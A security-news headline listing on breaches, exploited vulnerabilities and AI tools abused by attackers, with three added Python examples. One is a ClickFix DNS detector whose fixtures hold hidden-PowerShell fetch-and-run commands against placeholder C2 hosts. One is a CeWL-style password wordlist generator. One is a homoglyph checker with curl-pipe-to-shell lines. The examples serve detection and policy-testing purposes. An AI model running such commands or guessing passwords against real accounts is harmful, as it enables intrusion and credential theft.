Category: Security
-
CISA orders feds to patch actively exploited Dell flaw within 3 days
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) ordered government agencies to patch their systems within three days against a maximum-severity Dell vulnerability that has been under active exploitation since mid-2024. […] Sergiu Gatlan Go to bleepingcomputer
-
Critical infra Honeywell CCTVs vulnerable to auth bypass flaw
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of a critical vulnerability in multiple Honeywell CCTV products that allows unauthorized access to feeds or account hijacking. […] Bill Toulas
-
AI platforms can be abused for stealthy malware communication
AI assistants like Grok and Microsoft Copilot with web browsing and URL-fetching capabilities can be abused to intermediate command-and-control (C2) activity. […] Bill Toulas
-
Telegram channels expose rapid weaponization of SmarterMail flaws
Underground Telegram channels shared SmarterMail exploit PoCs and stolen admin credentials within days of disclosure. Flare explains how monitoring these communities reveals rapid weaponization of CVE-2026-24423 and CVE-2026-23760 tied to ransomware activity. […] Sponsored by Flare
-
Data breach at fintech firm Figure affects nearly 1 million accounts
Hackers have stolen the personal and contact information of nearly 1 million accounts after breaching the systems of Figure Technology Solutions, a self-described blockchain-native financial technology company. […] Sergiu Gatlan
-
Flaws in popular VSCode extensions expose developers to attacks
Vulnerabilities with high to critical severity ratings affecting popular Visual Studio Code (VSCode) extensions collectively downloaded more than 128 million times could be exploited to steal local files and execute code remotely. […] Bill Toulas
-
Chinese hackers exploiting Dell zero-day flaw since mid-2024
A suspected Chinese state-backed hacking group has been quietly exploiting a critical Dell security flaw in zero-day attacks that started in mid-2024. […] Sergiu Gatlan
-
Notepad++ boosts update security with ‘double-lock’ mechanism
Notepad++ has adopted a “double-lock” design for its update mechanism to address recently exploited security gaps that resulted in a supply-chain compromise. […] Bill Toulas
-
Ireland now also investigating X over Grok-made sexual images
Ireland’s Data Protection Commission (DPC), the country’s data protection authority, has opened a formal investigation into X over the use of the platform’s Grok artificial intelligence tool to generate non-consensual sexual images of real people, including children. […] Sergiu Gatlan
-
Washington Hotel in Japan discloses ransomware infection incident
The Washington Hotel brand in Japan has announced that its servers were compromised in a ransomware attack, exposing various business data. […] Bill Toulas
-
Eurail says stolen traveler data now up for sale on dark web
Eurail B.V., the operator that provides access to 250,000 kilometers of European railways, confirmed that data stolen in a breach earlier this year is being offered for sale on the dark web. […] Bill Toulas
-
Man arrested for demanding reward after accidental police data leak
Dutch authorities arrested a 40-year-old man after he downloaded confidential documents that had been mistakenly shared by the police and refused to delete them unless he received “something in return.” […] Sergiu Gatlan
-
Infostealer malware found stealing OpenClaw secrets for first time
With the massive adoption of the OpenClaw agentic AI assistant, information-stealing malware has been spotted stealing files associated with the framework that contain API keys, authentication tokens, and other secrets. […] Bill Toulas
-
Google patches first Chrome zero-day exploited in attacks this year
Google has released emergency updates to fix a high-severity Chrome vulnerability exploited in zero-day attacks, marking the first such security flaw patched since the start of the year. […] Sergiu Gatlan
-
Canada Goose investigating as hackers leak 600K customer records
ShinyHunters, a well-known data extortion group, claims to have stolen more than 600,000 Canada Goose customer records containing personal and payment-related data. Canada Goose told BleepingComputer the dataset appears to relate to past customer transactions and that it has not found evidence of a breach of…
-
New ClickFix attack abuses nslookup to retrieve PowerShell payload via DNS
Threat actors are now abusing DNS queries as part of ClickFix social engineering attacks to deliver malware, making this the first known use of DNS as a channel in these campaigns. […] Lawrence Abrams
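The technique in this item is a defender's problem: nslookup is a signed, ubiquitous binary, and a TXT record is a perfectly legitimate thing to ask for. What is unusual is the combination of a TXT lookup, something that executes the answer, and a process tree rooted in the Run dialog. The triage script below is an added example, not code from the article or from any vendor; the events are constructed records whose field names mirror Sysmon Event ID 1, and all hostnames are `.invalid` placeholders.

```python
"""Triage process-creation events for ClickFix-style payload retrieval over DNS.

Added illustration, not code from the BleepingComputer article or any vendor.
The event records below are constructed for this example; the field names
(ParentImage, Image, CommandLine) mirror Sysmon Event ID 1, but no real
telemetry, hostnames or payloads are used.
"""
import re

# nslookup asked for a TXT record, the record type that carries enough
# free-form text to smuggle a script. Windows nslookup accepts -type=, -q=
# and -querytype= as the option name.
TXT_QUERY = re.compile(r"\bnslookup\b[^|&;]*?\s-(?:type|q|querytype)=txt\b", re.IGNORECASE)

# Something in the same command line that would execute whatever came back.
EXEC_SINK = re.compile(
    r"\b(?:powershell|pwsh|iex|invoke-expression|mshta|wscript|cscript)\b", re.IGNORECASE
)

# ClickFix lures have the victim paste into the Run dialog, so the process
# tree starts at explorer.exe rather than at a terminal or admin tooling.
RUN_DIALOG_PARENTS = {"explorer.exe"}

SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd /c for /f \"tokens=*\" %a in ('nslookup -type=txt lure.example.invalid') "
                       "do powershell -nop -w hidden -e %a",
    },
    {
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\nslookup.exe",
        "CommandLine": "nslookup -q=txt _dmarc.example.invalid",
    },
    {
        "ParentImage": r"C:\Program Files\AdminTools\console.exe",
        "Image": r"C:\Windows\System32\nslookup.exe",
        "CommandLine": "nslookup -type=mx example.invalid",
    },
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -nop -w hidden -c \"iex (nslookup -type=txt c2.example.invalid)[-1]\"",
    },
]


def indicators(event: dict) -> list[str]:
    """Return the names of the heuristics that fire for one event, in a fixed order."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    found = []
    if TXT_QUERY.search(cmd):
        found.append("dns_txt_lookup")
    if EXEC_SINK.search(cmd):
        found.append("exec_sink_in_same_command")
    if parent in RUN_DIALOG_PARENTS:
        found.append("spawned_from_explorer")
    return found


def triage(events: list[dict], threshold: int = 2) -> list[dict]:
    """Keep events where a TXT lookup coincides with at least one more indicator.

    A lone TXT query is common (mail admins checking SPF/DMARC), so it is only
    reported when the command also executes the answer or comes from the Run
    dialog path that ClickFix relies on.
    """
    hits = []
    for ev in events:
        ind = indicators(ev)
        if "dns_txt_lookup" in ind and len(ind) >= threshold:
            hits.append({"CommandLine": ev["CommandLine"], "indicators": ind})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(", ".join(hit["indicators"]), "<-", hit["CommandLine"])
```

With the default threshold the second record (a plain `-q=txt` query from a console) is left alone, while the two Run-dialog chains that feed the answer into PowerShell are reported. Tune `threshold` and `RUN_DIALOG_PARENTS` to your environment; the regexes are deliberately narrow so that the heuristic stays explainable in an alert.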
-
CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups
CTM360 reports 4,000+ malicious Google Groups and 3,500+ Google-hosted URLs used to spread the Lumma Stealer infostealing malware and a trojanized “Ninja Browser.” The report details how attackers abuse trusted Google services to steal credentials and maintain persistence across Windows and Linux systems. […]
-
One threat actor responsible for 83% of recent Ivanti RCE attacks
Threat intelligence observations show that a single threat actor is responsible for most of the active exploitation of two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-21962 and CVE-2026-24061. […] Bill Toulas
-
Snail mail letters target Trezor and Ledger users in crypto-theft attacks
Threat actors are sending physical letters pretending to be from Trezor and Ledger, makers of cryptocurrency hardware wallets, to trick users into submitting recovery phrases in crypto theft attacks. […] Lawrence Abrams
-
Fake job recruiters hide malware in developer coding challenges
A new variation of the fake recruiter campaign from North Korean threat actors is targeting JavaScript and Python developers with cryptocurrency-related tasks. […] Bill Toulas
-
Claude LLM artifacts abused to push Mac infostealers in ClickFix attack
Threat actors are abusing Claude artifacts and Google Ads in ClickFix campaigns that deliver infostealer malware to macOS users searching for specific queries. […] Bill Toulas
-
Louis Vuitton, Dior, and Tiffany fined $25 million over data breaches
South Korea has fined luxury fashion brands Louis Vuitton, Christian Dior Couture, and Tiffany $25 million for failing to implement adequate security measures, which facilitated unauthorized access and the exposure of data belonging to more than 5.5 million customers. […] Bill Toulas
-
Turning IBM QRadar Alerts into Action with Criminal IP
Criminal IP now integrates with IBM QRadar SIEM and SOAR to bring external IP-based threat intelligence directly into detection and response workflows. See how risk scoring and automated enrichment help SOC teams prioritize high-risk IPs and accelerate investigations without leaving QRadar. […] Sponsored by Criminal IP
-
CISA flags critical Microsoft SCCM flaw as exploited in attacks
CISA ordered federal agencies on Thursday to secure their systems against a critical Microsoft Configuration Manager vulnerability patched in October 2024 and now exploited in attacks. […] Sergiu Gatlan
-
Russia tries to block WhatsApp, Telegram in communication blockade
The Russian government is attempting to block WhatsApp in the country as its crackdown on communication platforms not under its control intensifies. […] Bill Toulas
-
Bitwarden introduces ‘Cupid Vault’ for secure password sharing
Bitwarden has launched a new system called ‘Cupid Vault’ that allows users to safely share passwords with trusted email addresses. […] Bill Toulas
-
Critical BeyondTrust RCE flaw now exploited in attacks, patch now
A critical pre-authentication remote code execution vulnerability in BeyondTrust Remote Support and Privileged Remote Access appliances is now being exploited in attacks after a PoC was published online. […] Lawrence Abrams
-
Microsoft: New Windows LNK spoofing issues aren’t vulnerabilities
Today, at Wild West Hackin’ Fest, security researcher Wietze Beukema disclosed multiple vulnerabilities in Windows LNK shortcut files that allow attackers to deploy malicious payloads. […] Sergiu Gatlan
-
Google says hackers are abusing Gemini AI for all attack stages
Google Threat Intelligence Group (GTIG) has published a new report warning about AI model extraction/distillation attacks, in which private-sector firms and researchers use legitimate API access to systematically probe models and replicate their logic and reasoning. […] Bill Toulas
-
Windows 11 Notepad flaw let files execute silently via Markdown links
Microsoft has fixed a “remote code execution” vulnerability in Windows 11 Notepad that allowed attackers to execute local or remote programs by tricking users into clicking specially crafted Markdown links, without displaying any Windows security warnings. […] Lawrence Abrams
-
Apple fixes zero-day flaw used in ‘extremely sophisticated’ attacks
Apple has released security updates to fix a zero-day vulnerability that was exploited in an “extremely sophisticated attack” targeting specific individuals. […] Lawrence Abrams
-
Microsoft Store Outlook add-in hijacked to steal 4,000 Microsoft accounts
The AgreeTo add-in for Outlook has been hijacked and turned into a phishing kit that stole more than 4,000 Microsoft account credentials. […] Bill Toulas
-
Crazy ransomware gang abuses employee monitoring tool in attacks
A member of the Crazy ransomware gang is abusing legitimate employee monitoring software and the SimpleHelp remote support tool to maintain persistence in corporate networks, evade detection, and prepare for ransomware deployment. […] Lawrence Abrams
-
New Linux botnet SSHStalker uses old-school IRC for C2 comms
A newly documented Linux botnet named SSHStalker is using the IRC (Internet Relay Chat) communication protocol for command-and-control (C2) operations. […] Bill Toulas
-
North Korean hackers use new macOS malware in crypto-theft attacks
North Korean hackers are running tailored campaigns using AI-generated video and the ClickFix technique to deliver malware for macOS and Windows to targets in the cryptocurrency sector. […] Bill Toulas
-
Microsoft releases Windows 10 KB5075912 extended security update
Microsoft has released the Windows 10 KB5075912 extended security update to fix February 2026 Patch Tuesday vulnerabilities, including six zero-days, and continue rolling out replacements for expiring Secure Boot certificates. […] Lawrence Abrams
-
Malicious 7-Zip site distributes installer laced with proxy tool
A fake 7-Zip website is distributing a trojanized installer of the popular archiving tool that turns the user’s computer into a residential proxy node. […] Bill Toulas
-
Fugitive behind $73M ‘pig butchering’ scheme gets 20 years in prison
A dual Chinese and St. Kitts and Nevis national was sentenced to 20 years in prison in absentia for his role in an international cryptocurrency investment scheme (also known as pig butchering or romance baiting) that defrauded victims of more than $73 million. […]
-
Chinese cyberspies breach Singapore’s four largest telcos
The Chinese threat actor tracked as UNC3886 breached Singapore’s four largest telecommunication service providers, Singtel, StarHub, M1, and Simba, at least once last year. […] Bill Toulas
-
Hackers breach SmarterTools network using flaw in its own software
SmarterTools confirmed last week that the Warlock ransomware gang breached its network after compromising an email system, but said the intrusion did not impact business applications or account data. […] Bill Toulas
-
Hackers exploit SolarWinds WHD flaws to deploy DFIR tool in attacks
Hackers are now exploiting SolarWinds Web Help Desk (WHD) vulnerabilities to gain code execution rights on exposed systems and deploy legitimate tools, including the Velociraptor forensics tool, for persistence and remote control. […] Bill Toulas
-
Password guessing without AI: How attackers build targeted wordlists
Attackers don’t need AI to crack passwords; they build targeted wordlists from an organization’s own public language. This article explains how tools like CeWL turn websites into high-success password guesses and why complexity rules alone fall short. […] Sponsored by Specops Software
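To make the item's point concrete, here is an added example (not CeWL's or Specops' code) of the CeWL approach: crawl visible page text for the words an organization uses about itself, rank them by frequency, then apply the case, leet and suffix mangling that users apply when a policy forces "complexity". The HTML is a constructed page for a fictional company, and the suffix list is a small, common subset.

```python
"""Build a targeted password wordlist from an organisation's own web copy.

Added illustration of the CeWL-style approach the article describes; this is
not CeWL's code nor Specops'. The HTML below is a constructed page for a
fictional company, and the mangling rules are a small, common subset.
"""
import re
from collections import Counter
from html.parser import HTMLParser

SAMPLE_HTML = """<html><head><title>Northwind Freight</title>
<style>.hero{color:#333}</style>
<script>var tracker = "javascriptonlyword";</script></head>
<body><h1>Northwind Freight Logistics</h1>
<p>Northwind has moved freight through Seattle since 1998. Northwind's
Seattle terminal handles intermodal containers, reefer loads and bulk cargo.</p>
<p>Careers at Northwind: dispatchers, drivers, terminal operators. Join the
Northwind family.</p></body></html>"""


class _VisibleText(HTMLParser):
    """Collect rendered text only; script and style bodies are not wordlist material."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def extract_words(html: str, min_len: int = 5) -> list[str]:
    """Words from visible text, most frequent first (CeWL's core idea)."""
    parser = _VisibleText()
    parser.feed(html)
    tokens = re.findall(r"[A-Za-z][A-Za-z0-9]+", " ".join(parser.chunks))
    counts = Counter(t.lower() for t in tokens if len(t) >= min_len)
    return [w for w, _ in counts.most_common()]


LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})
SUFFIXES = ("!", "1", "123", "#", "2024", "2025", "2026", "2024!", "2025!", "2026!")


def mangle(base: str) -> set[str]:
    """Case, leet and suffix variants that typical password policies accept."""
    forms = {base, base.capitalize(), base.upper(), base.translate(LEET),
             base.capitalize().translate(LEET)}
    return forms | {f + s for f in forms for s in SUFFIXES}


def build_wordlist(html: str, top_n: int = 50) -> list[str]:
    """Mangled candidates for the top_n most frequent site words."""
    candidates = set()
    for word in extract_words(html)[:top_n]:
        candidates |= mangle(word)
    return sorted(candidates)


def meets_complexity(pw: str, min_len: int = 12) -> bool:
    """The classic 'length plus three of four character classes' rule."""
    classes = [any(c.islower() for c in pw), any(c.isupper() for c in pw),
               any(c.isdigit() for c in pw), any(not c.isalnum() for c in pw)]
    return len(pw) >= min_len and sum(classes) >= 3


if __name__ == "__main__":
    wl = build_wordlist(SAMPLE_HTML)
    for pw in ("Northwind2025!", "S3@ttl3123", "freight"):
        print(f"{pw:16} complexity={meets_complexity(pw)!s:5} in_wordlist={pw in wl}")
```

`Northwind2025!` satisfies a 12-character, three-class policy and is also one of the first few hundred guesses this list produces, which is the article's point: complexity rules score character classes, not predictability. A banned-password check against a list built from your own site (plus breach corpora) catches what the rule misses.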
-
European Commission discloses breach that exposed staff data
The European Commission is investigating a breach after finding evidence that its mobile device management platform was hacked. […] Sergiu Gatlan
-
New tool blocks imposter attacks disguised as safe commands
A new open-source and cross-platform tool called Tirith can detect homoglyph attacks in command-line environments by analyzing URLs in typed commands and stopping their execution. […] Bill Toulas
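The check such a tool has to make is small but has two halves: a URL whose hostname mixes Unicode scripts (a Cyrillic letter dropped into an otherwise Latin name), and the same hostname in the ASCII punycode form an attacker actually registers, which only looks suspicious once decoded. The script below is an added example of that check, not Tirith's code; the commands are constructed, the spoofed host uses Cyrillic `і` (U+0456) for the Latin `i`, and the example/invalid hostnames are not real infrastructure.

```python
"""Flag look-alike hostnames in URLs embedded in a typed shell command.

Added illustration of the kind of check a tool like Tirith performs; this is
not Tirith's code. The commands below are constructed: the spoofed host uses a
Cyrillic 'і' (U+0456) in place of the Latin 'i', and the hostnames are example
names, not real infrastructure.
"""
import re
import unicodedata
from urllib.parse import urlsplit

URL_RE = re.compile(r"(?:https?|ftp)://[^\s'\"<>|;&)]+", re.IGNORECASE)


def script_of(ch: str) -> str:
    """Coarse Unicode script bucket taken from the character's name."""
    name = unicodedata.name(ch, "")
    for script in ("LATIN", "CYRILLIC", "GREEK", "ARMENIAN"):
        if name.startswith(script):
            return script
    return "OTHER"


def inspect_host(host: str) -> list[str]:
    """Findings for one hostname: punycode, mixed scripts, or any non-ASCII letters."""
    findings = []
    try:
        # Judge xn-- labels by what they render as, not by their ASCII form.
        rendered = host.encode("ascii").decode("idna") if host.isascii() else host
    except UnicodeError:
        return ["undecodable IDNA label"]
    if rendered != host:
        findings.append(f"punycode host renders as {rendered}")
    scripts = {script_of(c) for c in rendered if c.isalpha()}
    if len(scripts) > 1:
        findings.append("mixed scripts " + "+".join(sorted(scripts)))
    elif any(ord(c) > 127 for c in rendered):
        findings.append("non-ASCII hostname")
    return findings


def inspect_command(command: str) -> dict[str, list[str]]:
    """Map each suspicious URL in the command to its findings; empty dict means clean."""
    report = {}
    for url in URL_RE.findall(command):
        host = urlsplit(url).hostname or ""
        findings = inspect_host(host)
        if findings:
            report[url] = findings
    return report


# Constructed commands for the demonstration.
SAFE_COMMAND = "curl -fsSL https://raw.githubusercontent.com/example/tool/main/install.sh | sh"
SPOOFED_HOST = "raw.g\u0456thubusercontent.com"  # Cyrillic і: renders like the real name
SPOOFED_COMMAND = f"curl -fsSL https://{SPOOFED_HOST}/example/tool/main/install.sh | sh"
# The same host as an attacker would have to register it: ASCII punycode.
PUNYCODE_HOST = SPOOFED_HOST.encode("idna").decode("ascii")
PUNYCODE_COMMAND = f"curl -fsSL https://{PUNYCODE_HOST}/example/tool/main/install.sh | sh"


if __name__ == "__main__":
    for cmd in (SAFE_COMMAND, SPOOFED_COMMAND, PUNYCODE_COMMAND):
        report = inspect_command(cmd)
        print("BLOCK" if report else "allow", cmd)
        for url, findings in report.items():
            print("   ", url, "->", "; ".join(findings))
```

An all-Cyrillic hostname is reported as non-ASCII rather than as mixed-script, so a deployment can treat it as a softer signal than a Latin name with one foreign letter; the punycode path matters because the terminal shows `xn--` only if the command was typed by hand, while a copied lure can carry the Unicode form.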
-
State actor targets 155 countries in ‘Shadow Campaigns’ espionage op
A new state-aligned cyberespionage threat group, tracked as TGR-STA-1030/UNC6619, has conducted a global-scale operation dubbed the “Shadow Campaigns,” targeting government infrastructure in 155 countries. […] Bill Toulas
-
Payments platform BridgePay confirms ransomware attack behind outage
A major U.S. payment gateway and solutions provider says a ransomware attack has knocked key systems offline, triggering a widespread outage affecting multiple services. The incident began on Friday and quickly escalated into a nationwide disruption across BridgePay’s platform. […] Ax Sharma
-
Germany warns of Signal account hijacking targeting senior figures
Germany’s domestic intelligence agency is warning of suspected state-sponsored threat actors targeting high-ranking individuals in phishing attacks via messaging apps like Signal. […] Bill Toulas
-
DKnife Linux toolkit hijacks router traffic to spy, deliver malware
A newly discovered toolkit called DKnife has been used since 2019 to hijack traffic at the edge-device level and deliver malware in espionage campaigns. […] Bill Toulas
-
CISA warns of SmarterMail RCE flaw used in ransomware attacks
The Cybersecurity & Infrastructure Security Agency (CISA) in the U.S. has issued a warning about CVE-2026-24423, an unauthenticated remote code execution (RCE) flaw in SmarterMail that is used in ransomware attacks. […] Bill Toulas
-
EDR, Email, and SASE Miss This Entire Class of Browser Attacks
Many modern attacks happen entirely inside the browser, leaving little evidence for traditional security tools. Keep Aware shows why EDR, email, and SASE miss browser-only attacks and how visibility changes prevention. […] Sponsored by Keep Aware
-
Flickr discloses potential data breach exposing users’ names, emails
Photo-sharing platform Flickr is notifying users of a potential data breach after a vulnerability at a third-party email service provider exposed their real names, email addresses, IP addresses, and account activity. […] Sergiu Gatlan
-
Spain’s Ministry of Science shuts down systems after breach claims
Spain’s Ministry of Science (Ministerio de Ciencia) announced a partial shutdown of its IT systems, affecting several citizen- and company-facing services. […] Bill Toulas
-
CISA orders federal agencies to replace end-of-life edge devices
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a new binding operational directive requiring federal agencies to identify and remove network edge devices that no longer receive security updates from manufacturers. […] Sergiu Gatlan
-
Ransomware gang uses ISPsystem VMs for stealthy payload delivery
Ransomware operators are hosting and delivering malicious payloads at scale by abusing virtual machines (VMs) provisioned by ISPsystem, a legitimate virtual infrastructure management provider. […] Bill Toulas
-
Hackers compromise NGINX servers to redirect user traffic
A threat actor is compromising NGINX servers in a campaign that hijacks user traffic and reroutes it through the attacker’s backend infrastructure. […] Bill Toulas
-
Critical n8n flaws disclosed along with public exploits
Multiple critical vulnerabilities in the popular n8n open-source workflow automation platform allow escaping the confines of the environment and taking complete control of the host server. […] Bill Toulas
-
CISA: VMware ESXi flaw now exploited in ransomware attacks
CISA confirmed on Wednesday that ransomware gangs have begun exploiting a high-severity VMware ESXi sandbox escape vulnerability that was previously used in zero-day attacks. […] Sergiu Gatlan
-
CISA warns of five-year-old GitLab flaw exploited in attacks
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) ordered government agencies to patch their systems against a five-year-old GitLab vulnerability that is actively being exploited in attacks. […] Sergiu Gatlan
-
The Double-Edged Sword of Non-Human Identities
Leaked non-human identities like API keys and tokens are becoming a major breach driver in cloud environments. Flare shows how exposed machine credentials quietly grant attackers long-term access to enterprise systems. […] Sponsored by Flare
-
New GlassWorm attack targets macOS via compromised OpenVSX extensions
A new GlassWorm malware attack through compromised OpenVSX extensions focuses on stealing passwords, crypto-wallet data, and developer credentials and configurations from macOS systems. […] Bill Toulas
-
Russian hackers exploit recently patched Microsoft Office bug in attacks
Ukraine’s Computer Emergency Response Team (CERT) says that Russian hackers are exploiting CVE-2026-21509, a recently patched vulnerability in multiple versions of Microsoft Office. […] Bill Toulas
-
Malicious MoltBot skills used to push password-stealing malware
More than 230 malicious packages for the personal AI assistant OpenClaw (formerly known as Moltbot and ClawdBot) have been published in less than a week on the tool’s official registry and on GitHub. […] Bill Toulas
-
Exposed MongoDB instances still targeted in data extortion attacks
A threat actor is targeting exposed MongoDB instances in automated data extortion attacks demanding low ransoms from owners to restore the data. […] Bill Toulas
-
New Apple privacy feature limits location tracking on iPhones, iPads
Apple is introducing a new privacy feature that lets users limit the precision of location data shared with cellular networks on some iPhone and iPad models. […] Sergiu Gatlan
-
U.S. convicts ex-Google engineer for sending AI tech data to China
A U.S. federal jury has convicted Linwei Ding, a former software engineer at Google, for stealing AI supercomputer data from his employer and secretly sharing it with Chinese tech firms. […] Bill Toulas
-
Cloud storage payment scam floods inboxes with fake renewals
Over the past few months, a large-scale cloud storage subscription scam campaign has been targeting users worldwide with repeated emails falsely warning recipients that their photos, files, and accounts are about to be blocked or deleted due to an alleged payment failure. […] Lawrence Abrams
-
Mandiant details how ShinyHunters abuse SSO to steal cloud data
Mandiant says a wave of recent ShinyHunters SaaS data-theft attacks is being fueled by targeted voice phishing (vishing) attacks and company-branded phishing sites that steal single sign-on (SSO) credentials and multi-factor authentication (MFA) codes. […] Lawrence Abrams
-
Crypto wallets received a record $158 billion in illicit funds last year
Illegal cryptocurrency flows hit a record $158 billion in 2025, reversing a three-year trend of declining amounts from $86B in 2021 to $64B in 2024. […] Bill Toulas
-
Microsoft to disable NTLM by default in future Windows releases
Microsoft announced that it will disable the 30-year-old NTLM authentication protocol by default in upcoming Windows releases due to security vulnerabilities that expose organizations to cyberattacks. […] Sergiu Gatlan
-
Hugging Face abused to spread thousands of Android malware variants
A new Android malware campaign is using the Hugging Face platform as a repository for thousands of variations of an APK payload that collects credentials for popular financial and payment services. […] Bill Toulas
-
Ivanti warns of two EPMM flaws exploited in zero-day attacks
Ivanti has disclosed two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340, that were exploited in zero-day attacks. […] Lawrence Abrams
-
Google disrupts IPIDEA residential proxy networks fueled by malware
IPIDEA, one of the largest residential proxy networks used by threat actors, was disrupted earlier this week by Google Threat Intelligence Group (GTIG) in collaboration with industry partners. […] Bill Toulas
-
Match Group breach exposes data from Hinge, Tinder, OkCupid, and Match
Match Group, the owner of multiple popular online dating services including Tinder, Match.com, Meetic, OkCupid, and Hinge, confirmed a cybersecurity incident that compromised user data. […] Bill Toulas
-
Initial access hackers switch to Tsundere Bot for ransomware attacks
A prolific initial access broker tracked as TA584 has been observed using the Tsundere Bot alongside the XWorm remote access trojan to gain network access that could lead to ransomware attacks. […] Bill Toulas
-
Cyberattack on Polish energy grid impacted around 30 facilities
The coordinated attack on Poland’s power grid in late December targeted multiple distributed energy resource (DER) sites across the country, including combined heat and power (CHP) facilities and wind and solar dispatch systems. […] Bill Toulas
-
eScan confirms update server breached to push malicious update
MicroWorld Technologies, the maker of the eScan antivirus product, has confirmed that one of its update servers was breached and used to distribute an unauthorized update, later analyzed as malicious, to a small subset of customers earlier this month. […] Lawrence Abrams
-
Viral Moltbot AI assistant raises concerns over data security
Security researchers are warning of insecure deployments in enterprise environments of the Moltbot (formerly Clawdbot) AI assistant, which can lead to leaking API keys, OAuth tokens, conversation history, and credentials. […] Bill Toulas
-
New sandbox escape flaw exposes n8n instances to RCE attacks
Two vulnerabilities in the n8n workflow automation platform could allow attackers to fully compromise affected instances, access sensitive data, and execute arbitrary code on the underlying host. […] Bill Toulas
-
Fortinet blocks exploited FortiCloud SSO zero day until patch is ready
Fortinet has confirmed a new, actively exploited critical FortiCloud single sign-on (SSO) authentication bypass vulnerability, tracked as CVE-2026-24858, and says it has mitigated the zero-day attacks by blocking FortiCloud SSO connections from devices running vulnerable firmware versions. […] Lawrence Abrams
-
Chinese Mustang Panda hackers deploy infostealers via CoolClient backdoor
The Chinese espionage threat group Mustang Panda has updated its CoolClient backdoor to a new variant that can steal login data from browsers and monitor the clipboard. […] Bill Toulas
-
WinRAR path traversal flaw still exploited by numerous hackers
Multiple threat actors, both state-sponsored and financially motivated, are exploiting the CVE-2025-8088 high-severity vulnerability in WinRAR for initial access and to deliver various malicious payloads. […] Bill Toulas
-
Nike investigates data breach after extortion gang leaks files
Nike is investigating what it described as a “potential cyber security incident” after the World Leaks ransomware gang leaked 1.4 TB of files allegedly stolen from the sportswear giant. […] Sergiu Gatlan
-
New malware service guarantees phishing extensions on Chrome web store
A new malware-as-a-service (MaaS) called ‘Stanley’ promises to get malicious Chrome extensions through Google’s review process and published to the Chrome Web Store. […] Bill Toulas
-
New ClickFix attacks abuse Windows App-V scripts to push malware
A new malicious campaign mixes the ClickFix method with a fake CAPTCHA and a signed Microsoft Application Virtualization (App-V) script to ultimately deliver the Amatera infostealing malware. […] Bill Toulas
-
Microsoft patches actively exploited Office zero-day vulnerability
Microsoft has released emergency security updates to patch a high-severity Office zero-day vulnerability exploited in attacks. […] Sergiu Gatlan
-
Cloudflare misconfiguration behind recent BGP route leak
Cloudflare has shared more details about a recent 25-minute Border Gateway Protocol (BGP) route leak affecting IPv6 traffic, which caused measurable congestion, packet loss, and approximately 12 Gbps of dropped traffic. […] Bill Toulas
-
1Password adds pop-up warnings for suspected phishing sites
The 1Password digital vault and password manager has added built-in protection against phishing URLs to help users identify malicious pages and prevent them from sharing account credentials with threat actors. […] Bill Toulas
-
Sandworm hackers linked to failed wiper attack on Poland’s energy systems
A cyberattack targeting Poland’s power grid in late December 2025 has been linked to the Russian state-sponsored hacking group Sandworm, which attempted to deploy a new destructive data-wiping malware dubbed DynoWiper during the attack. […] Lawrence Abrams
-
Konni hackers target blockchain engineers with AI-built malware
The North Korean hacker group Konni (Opal Sleet, TA406) is using AI-generated PowerShell malware to target developers and engineers in the blockchain sector. […] Bill Toulas
-
ShinyHunters claim to be behind SSO-account data theft attacks
The ShinyHunters extortion gang claims it is behind a wave of ongoing voice phishing attacks targeting single sign-on (SSO) accounts at Okta, Microsoft, and Google, enabling threat actors to breach corporate SaaS platforms and steal company data for extortion. […] Lawrence Abrams
-
Malicious AI extensions on VSCode Marketplace steal developer data
Two malicious extensions in Microsoft’s Visual Studio Code (VSCode) Marketplace that were collectively installed 1.5 million times exfiltrate developer data to China-based servers. […] Bill Toulas
-
CISA confirms active exploitation of four enterprise software bugs
The Cybersecurity and Infrastructure Security Agency (CISA) in the U.S. warned of active exploitation of four vulnerabilities impacting enterprise software from Versa and Zimbra, the Vite frontend tooling framework, and the Prettier code formatter. […] Bill Toulas
-
US to deport Venezuelans who emptied bank ATMs using malware
South Carolina federal prosecutors announced that two Venezuelan nationals convicted of stealing hundreds of thousands of dollars from U.S. banks in an ATM jackpotting scheme will be deported after serving their sentences. […] Sergiu Gatlan
-
Hackers exploit critical telnetd auth bypass flaw to get root
A coordinated campaign has been observed targeting a recently disclosed critical-severity vulnerability that has been present in the GNU InetUtils telnetd server for 11 years. […] Bill Toulas
-
Okta SSO accounts targeted in vishing-based data theft attacks
Okta is warning about custom phishing kits built specifically for voice-based social engineering (vishing) attacks. BleepingComputer has learned that these kits are being used in active attacks to steal Okta SSO credentials for data theft. […] Lawrence Abrams
-
Curl ending bug bounty program after flood of AI slop reports
The developer of the popular curl command-line utility and library announced that the project will end its HackerOne security bug bounty program at the end of this month, after being overwhelmed by low-quality AI-generated vulnerability reports. […] Lawrence Abrams
-
SmarterMail auth bypass flaw now exploited to hijack admin accounts
Hackers began exploiting an authentication bypass vulnerability in SmarterTools’ SmarterMail email server and collaboration tool that allows resetting admin passwords. […] Bill Toulas
-
Microsoft Teams to add brand impersonation warnings to calls
Microsoft will soon add new fraud protection features to Teams calls, warning users about external callers who attempt to impersonate trusted organizations in social engineering attacks. […] Sergiu Gatlan
-
INC ransomware opsec fail allowed data recovery for 12 US orgs
